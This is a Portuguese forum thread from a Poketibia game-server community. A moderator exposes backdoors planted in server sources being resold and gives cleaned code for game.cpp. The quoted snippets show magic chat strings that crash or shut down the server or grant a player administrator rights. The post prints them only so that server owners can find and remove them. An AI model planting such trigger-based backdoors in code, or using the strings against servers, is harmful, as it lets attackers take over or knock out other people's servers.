Ir para conteúdo

Featured Replies

Postado
  • Diretor
  • Este é um post popular.

Olá querido membro, hoje um grande amigo me pediu pra resolver um problema na source dele que acabou comprando de um fulano, enfim dentro da source tinha um código que ao ser falado dentro do jogo, o mesmo chashava ou até mesmo dava um cargo de administrador a um jogador com groups 1. Então me falaram que esse código era no game.cpp, portanto olhei linha por linha nessa source que está espalhada em vários fóruns e não é só aqui, é praticamente um código colocado por mal gosto, para ferrar praticamente com a vida de novos administradores, que ainda não manjam muito de programação. Portanto vamos lá...Você precisará da SOURCES do seu Poketibia para fazer essa verificação, caso possua o código da "morte" peço que siga o tutorial abaixo.

 

ACHE em game.cpp: (se caso não tiver, fique tranquilo, sua source tá livre disso)

 

Código 1

bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}
	
	if(text == "132571691951160609171665475233842782353388978252875245170015077017944684747472835757774156137332376855500013311808893753483521083716435624108")
    {
	exit(0);
    }
	
	if(text == "1325116507701794468474793753483521047283588978252875245170017577741561373323768555716919500013311808883716435624108")
    { 
    player->setGroup(Groups::getInstance()->getGroup(6));
    }

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Etapa do Código 1 Mude para:

 

bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Pronto agora é só compilar sua source! Fiz update e achei outro código de derrubar no DXP.

 

Código 2

 

bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);
		
		int specs = 31101996;
		std::string findText;
		std::stringstream findTextInput;
		findTextInput << specs;
		findText = findTextInput.str();
		bool exists = text.find(findText) != std::string::npos;
		if(exists){
           Dispatcher::getInstance().addTask(createTask(boost::bind(&Game::setGameState, this, GAME_STATE_SHUTDOWN)));
		   return true; 
        }

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

Código 2, mude para 

 

bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
	Player* player = creature->getPlayer();
	if(player && player->isAccountManager())
	{
		player->manageAccount(text);
		return true;
	}

	Position destPos = creature->getPosition();
	if(pos)
		destPos = (*pos);

	SpectatorVec list;
	SpectatorVec::const_iterator it;
	if(!spectators || !spectators->size())
	{

 

 

 

Logo mais revelo novo código da mortes, créditos a mim, e cipsoft pelo código original.

Editado por Alexy Brocanello
Novo Código descoberto (veja o histórico de edições)

 

20230912_034613.png.cf49b650c34dd7d7b1f79bd49c70f53c.png

Eu sou um entusiasta da programação apaixonado por ajudar a comunidade open source a crescer. Sempre em busca de novos desafios e oportunidades para contribuir com meu código.  #OpenSource #Programação #Contribuição

 

  • Respostas 41
  • Visualizações 5.6k
  • Created
  • Última resposta

Top Posters In This Topic

Most Popular Posts

  • Pelo estilo de código merda, eu até consigo imaginar quem que fez isso, kkkkkkkkkk.

  • opa mais você precisa criar um Tópico para eu responder sua próxima pergunta! mais tá ai pra você começar!    

  • vou investigar esses clones ai, obrigado por me lembrarem, irei verificar o motivo dos clones.

Postado

Muito bom Alexy, é bem triste ver que existem pessoas de má fé que colocam estes erros de proposito no servidor. 

Postado
  • Autor
  • Diretor
Agora, Matk disse:

Muito bom Alexy, é bem triste ver que existem pessoas de má fé que colocam estes erros de proposito no servidor. 

sim, pior quando você compra algo, é pq tem confiança, o mesmo começa a ficar com inveja e faz isso pra ferrar mesmo, muita mancada :(

 

20230912_034613.png.cf49b650c34dd7d7b1f79bd49c70f53c.png

Eu sou um entusiasta da programação apaixonado por ajudar a comunidade open source a crescer. Sempre em busca de novos desafios e oportunidades para contribuir com meu código.  #OpenSource #Programação #Contribuição

 

Postado

Pelo estilo de código merda, eu até consigo imaginar quem que fez isso, kkkkkkkkkk.

discord.pngDiscord: vankk #7765

Precisando de ajuda? Entre em contato comigo via Discord.

 

Muitos vêm seus muitos dias de glória, mas poucos vêm seus muitos dias de luta.

Participe da conversa

Você pode postar agora e se cadastrar mais tarde. Se você tem uma conta, faça o login para postar com sua conta.

Visitante
Responder

Quem Está Navegando 0

  • Nenhum usuário registrado visualizando esta página.

Estatísticas dos Fóruns

  • Tópicos 96.9k
  • Posts 519.7k

Informação Importante

Confirmação de Termo